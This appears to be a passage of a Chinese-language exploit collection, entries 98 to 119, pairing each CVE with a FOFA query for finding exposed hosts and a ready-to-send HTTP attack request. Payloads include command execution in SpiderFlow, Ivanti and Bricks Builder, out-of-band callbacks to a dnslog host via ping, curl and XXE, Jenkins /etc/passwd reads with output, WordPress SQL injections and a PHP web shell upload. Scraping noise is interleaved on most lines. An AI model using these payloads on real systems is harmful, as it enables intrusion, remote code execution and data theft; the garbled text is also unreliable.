1 s6 x' t; j6 g9 b3 {GET /passport/login/ HTTP/1.1$ `) S2 c' t, ^3 D+ A
Host: 192.168.40.130:8085
" ^5 `/ W+ [. E; U: X# ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 ~. |+ e7 g# yAccept-Encoding: gzip
1 \- j$ G. j- m3 yConnection: close
9 y* \" ^. H1 {) u% d# U$ FCookie: rememberMe=PAYLOAD1 o, E2 P& l5 O8 s; z: X8 C3 A
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"3 Z  c1 n) z* z! i2 K

6 x9 E1 Z' P  G# x$ J
5 \1 n/ w& ]6 I  T98. SpiderFlow爬虫平台远程命令执行
+ O' Z( ?; e5 K- i! H( b% VCVE-2024-01956 r* w8 O/ L$ E* O
FOFA:app="SpiderFlow"
$ Q& z: s! N* m9 U6 \/ `POST /function/save HTTP/1.1
! V7 A5 X5 k- I' M1 CHost: 192.168.40.130:8088
7 E" Q; i* W% {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( Z) M; u8 |+ q8 R8 ]* ?5 A3 e
Connection: close
8 C. d. j6 l/ d1 BContent-Length: 1217 V/ K2 ~+ l* a/ h- y' i
Accept: */*
  @# V! t& K. v/ ]1 MAccept-Encoding: gzip, deflate7 A5 R- J) ^) R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 O) X1 k0 g# H3 u
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" E" t" H0 B# Q0 IX-Requested-With: XMLHttpRequest
; U5 @, j; ?; @& [+ u) ~; n8 X% o3 z5 R$ b" d# Y
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
% Y- g3 ^7 V: W0 C! `7 |3 T, q: `# h7 D$ A- ~$ `

' W- D( e) Y7 m3 u$ N, `( P" C99. Ncast盈可视高清智能录播系统busiFacade RCE
! L. c' O+ g5 ~CVE-2024-0305$ s/ {: W) j/ ?4 l( e( U0 f
FOFA:app="Ncast-产品" && title=="高清智能录播系统"1 @9 l, }; u8 [! k
POST /classes/common/busiFacade.php HTTP/1.19 k  L) g! N  B, r! J8 U: i' }
Host: 192.168.40.130:80808 V- L% X  h9 O2 Q/ J- T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: G9 \) }$ n1 C* K( EConnection: close
" N0 e5 n, }, Q- k  Q+ |Content-Length: 154
' T( X; E' I6 yAccept: */*/ Y7 p7 Z6 t. O7 h" x
Accept-Encoding: gzip, deflate
/ _: m# T4 D, ?* ], j# UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 g: X. Y0 {5 N! Y8 lContent-Type: application/x-www-form-urlencoded; charset=UTF-8- ~. Z) x7 X1 j
X-Requested-With: XMLHttpRequest  C+ u9 c1 d0 z6 x7 H: t

! a' b8 v8 ~% C  c% W%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D- [2 N) Y! N6 [0 t; Z

" M: {6 H; a; U5 J; m6 U; \( Z/ C/ r  v, _2 Y" P$ v
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传: e( |4 Q2 \9 f
CVE-2024-0352
# F1 T6 V: [* t& x1 ~FOFA:icon_hash="874152924"
* N5 H& A% ]' o  o! xPOST /api/file/formimage HTTP/1.1) U3 w  @9 g4 T+ A) S
Host: 192.168.40.1308 S. r$ T" s) I& d4 T
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ N0 _! q, U5 i/ D3 `; s# wConnection: close1 E+ D4 |7 V+ G9 W8 X
Content-Length: 201
, e& @* Q% l% h, R& D! {Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
( i# V; N; x7 f6 B" _- bAccept-Encoding: gzip
/ l: j- G" l( |7 r
$ k: p9 r3 [* L; [% i% i% ^------WebKitFormBoundarygcflwtei. q( I/ v$ G6 G! q2 @
Content-Disposition: form-data; name="file";filename="IE4MGP.php"2 ]1 W, H) \/ o9 v% a
Content-Type: application/x-php
  w; T7 G: u! v: E- t& W; M: q. l& ~$ ?* f1 t3 @# T4 q" Y3 A
2ayyhRXiAsKXL8olvF5s4qqyI2O8 F* a0 P9 V7 s5 e) e4 Y
------WebKitFormBoundarygcflwtei--
) f& d; J& c1 u" s& m5 J3 O5 c! O& w. ?/ v, ^# E. S
" s# {( u( h2 h9 T; _/ @" X8 n
101. ivanti policy secure-22.6命令注入
* Y6 `6 J( s% X6 k/ jCVE-2024-21887: C5 H2 W4 S. O7 T" B0 ]
FOFA:body="welcome.cgi?p=logo"' t  ?9 G% d0 t4 g" v
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
  X6 H: Q6 M( d/ N, }Host: x.x.x.xx.x.x.x
2 \- i- [- g1 n2 g8 H4 Y& J7 v  T8 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' {! b1 t9 r! [7 u7 H
Connection: close/ c' K3 a5 i$ N/ E2 M0 T* _5 e0 U
Accept-Encoding: gzip
5 X' @4 u+ d" M' g3 }1 D1 k& w4 d* L% i
  V! H3 d5 F" e5 X1 g! v
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; W' i4 Y' D$ C; t; D8 n8 g0 z& x
CVE-2024-218930 h' W/ o  i/ i0 g5 L/ L
FOFA:body="welcome.cgi?p=logo"
1 b8 n+ S+ D2 r1 r: v  D" i0 vPOST /dana-ws/saml20.ws HTTP/1.1
  `. C' a+ O5 E# _7 T/ wHost: x.x.x.x
: Q" s& v1 L4 G6 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 h0 e0 }0 X" o& w, n1 b% L6 zConnection: close
8 K( {+ ?- l# _% U8 T6 ~' G- g$ UContent-Length: 792
- W, A! v! s7 n: p/ I, \% R' VAccept-Encoding: gzip
- ^: P3 E5 B$ w$ W- U
6 y0 {( f9 W4 I8 k4 N<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
4 L) g: u7 v9 U  F3 F4 b
0 K2 P" W) s' z  T4 [+ @, a103. Ivanti Pulse Connect Secure VPN XXE
* n5 q; w/ ~3 d. B: g! Z6 j9 E: dCVE-2024-22024
7 m/ u7 r5 G  w2 j- x5 oFOFA:body="welcome.cgi?p=logo"
. J9 ~. W, \- s2 L$ v& b! @! e9 N+ aPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
4 y( Q; n% v" q- pHost: 192.168.40.130:111/ O, I5 E' @* ^% t% t
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
, W, `3 l* B- M! @2 pConnection: close
. Z! |7 D( g" b* [5 |" _Content-Length: 204
+ S) L: r8 F# U& u0 rContent-Type: application/x-www-form-urlencoded; A6 R! E& \7 B2 q# N
Accept-Encoding: gzip
  l+ [! [2 ^2 f+ O+ H
" ]: [% n7 }' V* |- _5 A* U1 tSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
1 ]7 ?4 `+ c3 `2 b1 o% V% A2 `) @! F& q7 d  [
  S5 O( I8 o4 ]$ f
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
8 M& h3 }; U, C<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
& O, f8 Z& t4 G  G! v$ c/ }! j8 n/ D% |; Q. Q+ K

3 Z/ s8 f# w' N, H0 G5 f0 _* q104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露( X; d& P, X# ^/ E, l- m
CVE-2024-0569
) K: ~; C+ O/ K8 {- l' b# J. m" `FOFA:title="TOTOLINK"
' L4 ~5 r( R: A& KPOST /cgi-bin/cstecgi.cgi HTTP/1.10 D# L8 ?$ _' n+ |+ d" b
Host:192.168.0.1
! v2 d5 F. |2 x3 RContent-Length:41
# d# J+ _% N5 c! v/ s' ~Accept:application/json,text/javascript,*/*;q=0.01+ K/ M( x4 W5 T. |) L
X-Requested-with: XMLHttpRequest. g$ h. e, A! k+ X+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36: v" {; x  l9 Z3 K) X8 E8 v
Content-Type: application/x-www-form-urlencoded:charset=UTF-8& |$ m5 C/ M9 b5 [
Origin: http://192.168.0.1
5 _. h0 e, x: f( S% c5 X( z% WReferer: http://192.168.0.1/advance/index.html?time=16711523805640 b) ?$ C7 B6 v% v$ I, n
Accept-Encoding:gzip,deflate5 F. e/ ]/ t2 O4 o% o5 b
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7! L3 @5 O- n4 J7 g7 b4 a, `  U  a/ E
Connection:close8 v2 w, |8 C1 u. c8 P) U9 _7 I
$ z- W3 ]! D6 p; A/ R# z
{
- O8 y6 _* M: i% N5 C# o"topicurl":"getSysStatusCfg",+ D) P! ^1 ]2 Y+ c
"token":""
4 |8 N* G9 o8 P}: n- Z1 \1 K6 z

- G) a- y# O8 Z% o! N  b: j105. SpringBlade v3.2.0 export-user SQL 注入1 k+ r0 k" C4 v* K3 G
FOFA:body="https://bladex.vip"
2 ^/ f6 N. i- ^( V: U* `http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
( [3 v) ~/ S, N0 |& [
1 }4 O+ `! E) _2 \106. SpringBlade dict-biz/list SQL 注入5 g* @7 C6 p5 n* _
FOFA:body="Saber 将不能正常工作"1 q6 m% {4 @2 }) C
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1$ x7 M8 p+ x; F# \9 ~
Host: your-ip
2 f3 U5 ?3 _8 b4 z/ c/ Y, jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, U  v) v5 |8 i( o5 rBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
  }5 m$ x& @: ]1 X* uAccept-Encoding: gzip, deflate; y6 Z+ F; e) _2 m  Y- [
Accept-Language: zh-CN,zh;q=0.9+ i7 l8 E  {" N' x+ F0 Y' v; e
Connection: close
2 D/ a) n. ^$ n- u* |& i3 G8 c/ H: s& N- V

3 S# f' _) N2 T) ~* M- s107. SpringBlade tenant/list SQL 注入
. `: ~' H3 d' A, MFOFA:body="https://bladex.vip"
9 w! l- c0 Q' k: V* o& @9 K' GGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1+ u, ^( m5 d: I* M2 c- _, V
Host: your-ip! d3 V; k5 o  M: Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ n% n: D  M1 {+ k; sBlade-Auth:替换为自己的
+ n" |- w$ G( @5 L+ }/ T1 BConnection: close8 ]0 ^$ _# Y* Z
  ]8 |0 W. _' q; |# p: `) R

, J9 A- I* f5 A# V108. D-Tale 3.9.0 SSRF
% F7 D( Q! E( t6 [4 ?* KCVE-2024-216428 `( p4 W2 x# m9 Y) Y* R
FOFA:"dtale/static/images/favicon.png"
) w2 v' J& m" OGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
  @3 l* S: U2 ~! SHost: your-ip
. y/ [6 A4 G: yAccept: application/json, text/plain, */*6 r( g" Q0 @/ p' S% Q/ D: i! e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 Z8 H* w0 V6 r$ v, ?
Accept-Encoding: gzip, deflate. _5 ]$ T1 \" q" S6 Y$ w$ u+ F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 y+ X. v2 s) ]. i0 [! x: pConnection: close$ t, _' ^8 N1 U( U/ a) d
- h. F3 F) `* Q0 i

& K1 |; v1 b; s: d2 r109. Jenkins CLI 任意文件读取3 p# R- P0 Y( p1 K8 {
CVE-2024-23897
2 x2 X6 K* z# Q6 V2 \FOFA:header="X-Jenkins"
: u# e& Y( w" r) ?0 kPOST /cli?remoting=false HTTP/1.18 h& }3 ?" ~- a  }3 k9 c
Host:3 p# x& N$ N" ]2 z$ M% K5 }1 ~  s
Content-type: application/octet-stream
* {9 t- R% x. Z& `Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ Z+ l1 M/ S4 B! I4 r/ E
Side: upload
- ~0 x! ^* ]1 g0 e* Q; z1 m7 @% dConnection: keep-alive! R9 W7 G$ G% V+ B, Q
Content-Length: 163
( p) O2 [. u% }" ?' p) i- @
$ n6 T+ \9 q/ P8 |* z9 P( o9 Hb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
" }! W5 k6 b4 j( o4 R! L1 ^
) H2 s5 A3 `& t  N* I
( H% J  F# P) `POST /cli?remoting=false HTTP/1.18 C9 y: n; O* }/ l
Host:
$ J# h: H" _: T; V- c8 e1 n% hSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92, v3 V2 n) b( h! Z  @7 N
download5 u6 H  G  @* \% ]8 F
Content-Type: application/x-www-form-urlencoded+ r" A! h6 u0 h; t2 T8 a, s- J* a
Content-Length: 0
2 H4 Y2 }' ^+ t9 v
& G# g; f# @% q3 B
9 p; T+ I) B5 j/ u# [8 mERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ m$ X' E) l# K# \6 y6 |% ^java -jar jenkins-cli.jar help# d7 a& p/ e" ~- F  w7 R* Y. [
[COMMAND]
3 |3 V6 V" @' U- v9 |7 k8 qLists all the available commands or a detailed description of single command.
  _6 j; O' ^6 f COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)& H7 i6 V. C% s9 {
3 P3 K% B& d. ^/ N: M% c. d4 o: N

  ^) P2 a* c& n( W3 ?110. Goanywhere MFT 未授权创建管理员3 h0 H& u3 v1 Y% K0 h8 q
CVE-2024-0204) f9 ?# I& \9 Y0 {
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
0 Q3 h% e9 C( o" p# `GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.10 {  P9 y$ \# a$ \9 ^
Host: 192.168.40.130:8000
& J$ I! _+ V( M: V  r, H3 }User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" K8 C3 s. p0 G9 Q+ h% x
Connection: close
/ \/ I7 P0 I' t$ E: {8 kAccept: */*7 f$ W" e! l3 o* \
Accept-Language: en' K8 f5 G: D* B0 K
Accept-Encoding: gzip
' o! b% N3 A5 E1 C; d, j' f! ^$ L0 i) a( W' G2 e: \
2 @$ g1 x6 ]9 n& U8 {# h2 g- c
111. WordPress Plugin HTML5 Video Player SQL注入* s" ~/ W& G9 j" I
CVE-2024-1061$ a4 m4 e; n* g7 B8 t8 E
FOFA:"wordpress" && body="html5-video-player"
. E* J# _. e7 t. ~, m$ b/ MGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" d" N( y3 y2 ~2 ~
Host: 192.168.40.130:112& v; }/ l  W+ x2 B8 j( _" i( o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' b* y& W" M$ @+ d3 s8 u8 S; \
Connection: close- f3 i; C" g4 P- |: n9 j' i- g
Accept: */*! t+ l- _6 M8 Q+ c8 G$ I5 F3 H
Accept-Language: en- H6 S% L1 D. V5 P8 W% M  I( T
Accept-Encoding: gzip9 v3 F9 I+ v& z9 c$ X1 V

# J+ X& `7 q* k8 v( n, X
/ L) t. n* F  q5 W* A112. WordPress Plugin NotificationX SQL 注入
5 F  |- \1 h  u) u& g0 ?CVE-2024-1698
: K5 n; e5 R$ F# E7 g& |" o: R6 d9 zFOFA:body="/wp-content/plugins/notificationx"
+ @# F9 F# V( E% ], W6 R" MPOST /wp-json/notificationx/v1/analytics HTTP/1.1% F" P: U9 o8 I4 @, [+ g
Host: {{Hostname}}
( M5 t/ Q( {& r1 e, v1 CContent-Type: application/json. O4 c; o/ s1 z' m0 W

# [: u' Y3 F* m7 ~5 T' L{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}1 `3 h8 |& `5 l! f, K

5 ~( b1 `% {6 V+ d! |2 ?6 x4 w: V  M- M1 Q
113. WordPress Automatic 插件任意文件下载和SSRF# j7 t) Q* C% E; Z' j7 Z  b. R7 n
CVE-2024-279545 |0 ?7 z+ W: ]! q$ S5 W1 z
FOFA:"/wp-content/plugins/wp-automatic"9 k0 v" U( L: A/ X  y! J
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.10 c/ }7 `+ E& M7 Q7 }- f9 t' v
Host: x.x.x.x
3 j# }- U% p$ uUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 Y/ l. i% m2 ~$ j* V0 Z, }
Connection: close
+ v. |) [" l, E3 n5 \) F3 sAccept: */** u+ g' e4 v' G# X) L, N2 c( a; [
Accept-Language: en
# F4 c: d, |9 L/ L- O6 J2 D2 DAccept-Encoding: gzip' P6 j9 [$ Y, B% ?  y* f0 ?3 o

4 E: G+ N0 h5 W) \) Q. N4 Z" g$ l! J* |+ l
114. WordPress MasterStudy LMS插件 SQL注入
$ c+ j4 q) ?) h3 cFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"' W) T) G8 V% z7 p1 ^/ O
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
9 |0 I% H/ W9 I5 r& R( wHost: your-ip) ^* }; c( n- \$ W" Q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 p  e/ Y9 F/ r/ X4 r  S
Accept-Charset: utf-8+ }5 O" C& r1 H
Accept-Encoding: gzip, deflate  _- e( Z- W# a+ G! r
Connection: close2 U, F; l& B& \# Q7 N0 h! F

4 Y1 W3 {, Y* G. g8 z5 E
$ X$ y( [2 S2 s1 r0 }) g/ l6 M5 M115. WordPress Bricks Builder <= 1.9.6 RCE
) u" G7 U* h; i7 ?- O# sCVE-2024-25600! M6 G) P$ I. J7 R/ [
FOFA: body="/wp-content/themes/bricks/", O7 m- `* o/ `' U# Z  [( N( O
第一步,获取网站的nonce值
# P$ V$ f0 K2 D: ]GET / HTTP/1.1
6 s; o  N+ g2 y; \Host: x.x.x.x
' G. {( J3 j/ n* z' J" \& a3 RUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 S# f) Z8 {* }# }Connection: close9 U& c. K( O0 l/ {
Accept-Encoding: gzip4 D2 h5 A8 u/ }5 {3 l6 f

# _5 r! ~+ x+ }4 E; w# B5 m& E; |6 i
第二步替换nonce值,执行命令  |- Q1 t9 o4 A
POST /wp-json/bricks/v1/render_element HTTP/1.1! S- @( y: W7 {
Host: x.x.x.x0 t! G  E+ x+ g) M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 q6 T: g1 [$ S1 E- }! U
Connection: close" J) Z, P7 T, |6 D% f6 R+ s. P
Content-Length: 356
: z# S8 W! o0 x0 F; `Content-Type: application/json1 i$ C( a+ I8 Q
Accept-Encoding: gzip1 B2 |: U3 C' u; f( j

1 k% F; _1 y, J5 t% ?! V{
. }% O# |+ e8 e1 f& A1 z  u; Z"postId": "1",0 L' O* d8 p6 Z* u& p2 l6 N  t  L
  "nonce": "第一步获得的值",4 X( j; ?1 @+ Q' D
  "element": {5 I. k% H3 C& z0 p9 P1 T/ J
    "name": "container",
$ b8 v+ k8 L# k    "settings": {3 l  u# D( `* c; b2 J% B% x
      "hasLoop": "true",
  y3 K& r  M, Q9 N      "query": {
% g; R3 t' B3 f/ u! Y        "useQueryEditor": true," [' I7 A' w5 t( d
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",1 O2 E& x" J! y2 d5 b, w; [. H
        "objectType": "post"
' ~  j! Z9 Z+ ?: g& k/ q( k8 E3 `      }
! `1 Y8 R- T+ `. J- z# f* n: P: a    }
- X8 M6 y( _* c8 X2 ?  }
6 l) A1 b5 [* n' |}9 ]) a  _9 q8 g) Q3 i. }. @& T
* [5 Q: X% s+ Q  y6 J

- U2 {# k3 Y) M' g116. wordpress js-support-ticket文件上传& t  n) S7 Y* c' T
FOFA:body="wp-content/plugins/js-support-ticket"8 c9 h6 b; S/ M& e6 k; d7 R2 Y
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
' c, ^' c1 e# N# p  kHost:$ ?$ d9 W  H" X
Content-Type: multipart/form-data; boundary=--------767099171
$ g4 S0 i# E/ XUser-Agent: Mozilla/5.00 H# g0 h) q1 b( J) ^1 a
) W  ^+ g; ~$ K0 d) t4 I8 H
----------7670991713 U3 C4 ?2 \' K6 V8 m* }" ?8 L. O1 N
Content-Disposition: form-data; name="action"
) ]! G, a& }$ I- J5 j" k2 {configuration_saveconfiguration  |4 e9 O( f1 s/ I* t, k  _
----------767099171( i% `. S9 F* m) k; M
Content-Disposition: form-data; name="form_request"
6 F' \9 M6 s$ y/ Njssupportticket
5 e, z5 l. u! x----------767099171
) Z$ e8 M& r+ h' D* }& g% s# @5 {Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": r8 J/ h7 Y: `  s+ K! u, D
Content-Type: image/png
+ `+ Q( p" t' p- a7 ^: d5 O----------767099171--
! z0 ], N( e; M8 ?, b' r
5 z- O% A. i1 O* r# S/ T+ V" N) s9 c5 W, s7 r( P6 f
117. WordPress LayerSlider插件SQL注入
* x# y, s5 C- tversion:7.9.11 – 7.10.03 p! W1 _$ \! O' G8 c' [, w( ?4 E) A# z
FOFA:body="/wp-content/plugins/LayerSlider/"+ X8 P! X8 q0 R4 C
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
$ H9 W! n' J. G9 I. s* ]Host: your-ip6 [3 _( k* H, N, M2 j, X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 W: c! r6 O' S1 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 `' v: M; \* e$ M* O  z+ H) ^2 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 e5 `  A; m. ]6 U. Z
Accept-Encoding: gzip, deflate, br7 C( a( k4 z+ C4 z& G0 ?3 z( V
Connection: close8 w2 z$ A7 z% `! H* G5 e
Upgrade-Insecure-Requests: 1
% K$ y9 m- J8 R: i' J( @( h- l5 I3 A, {, B- U  p5 c: [
* I/ z/ S: m# R. e  D" h4 a" x, Y
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
) c+ }$ ~' I+ A$ r7 vCVE-2024-0939* `( d& p! H( E4 g4 |( c
FOFA:title="Smart管理平台"  \2 J9 I% v- o0 A; J$ C1 P
POST /Tool/uploadfile.php? HTTP/1.1. F7 ~7 d5 N. a6 V6 e1 a
Host: 192.168.40.130:8443
  U7 Y8 _; j# y& G  aCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
8 ?! H# _  j* T6 l7 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.08 b! u: l* I) }# t1 A9 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" `' u# [* Z$ C0 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' s% y8 y8 r5 RAccept-Encoding: gzip, deflate0 H' m3 F. m, Y
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 w! i) I# [" @0 j. x6 m3 TContent-Length: 405
8 H4 [# f; `+ uOrigin: https://192.168.40.130:8443: D8 [" r8 U, H' a% d, l
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
& W0 u: [* X1 B7 B6 PUpgrade-Insecure-Requests: 11 Y5 w; [. M" O# X* U
Sec-Fetch-Dest: document, X4 W+ p2 o! H6 i1 m
Sec-Fetch-Mode: navigate
/ j! V$ B, R- g7 qSec-Fetch-Site: same-origin: p8 T& e, _9 S3 F
Sec-Fetch-User: ?1! T! j5 x3 h4 E' C2 i: |
Te: trailers
- B. c: {2 @) e- e5 zConnection: close
4 M9 T' E) r! c$ I1 Z$ w+ R
: h4 \7 _: t$ U% q# f, M-----------------------------13979701222747646634037182887
% f: B4 K$ e1 U- f; |1 T3 xContent-Disposition: form-data; name="file_upload"; filename="contents.php"& i. i+ j5 \6 Z/ h, o
Content-Type: application/octet-stream
/ q& A2 }3 u( O4 m! D" l% y
: V4 f' W; ^& e+ e' G$ \<?php
( j+ p, g2 Z* q/ _; psystem($_POST["passwd"]);# h4 Z) |  [4 a) I0 H, j0 ~7 e& l
?>. l: k4 O- O. K
-----------------------------13979701222747646634037182887
6 K6 V! L& c  j% vContent-Disposition: form-data; name="txt_path"
5 K  g6 w. i4 `
. M  j1 T" O2 Z  `# h/home/src.php
3 E- S" X( ]6 r$ g5 F7 k8 e, W# R-----------------------------13979701222747646634037182887--
! A6 [5 @  [% Z! F$ V
' M/ L5 L* R6 m9 y) I* l" p! b; a9 c: g7 u" B8 @5 q1 N6 H
访问/home/src.php1 z: u) w$ d7 a" _6 _7 k

- g- S9 o' k9 T2 n( b119. 北京百绰智能S20后台sysmanageajax.php sql注入
% I; w# T  j- R) p) V# QCVE-2024-1254
3 V2 }& l( u7 t5 Q6 \5 tFOFA:title="Smart管理平台"
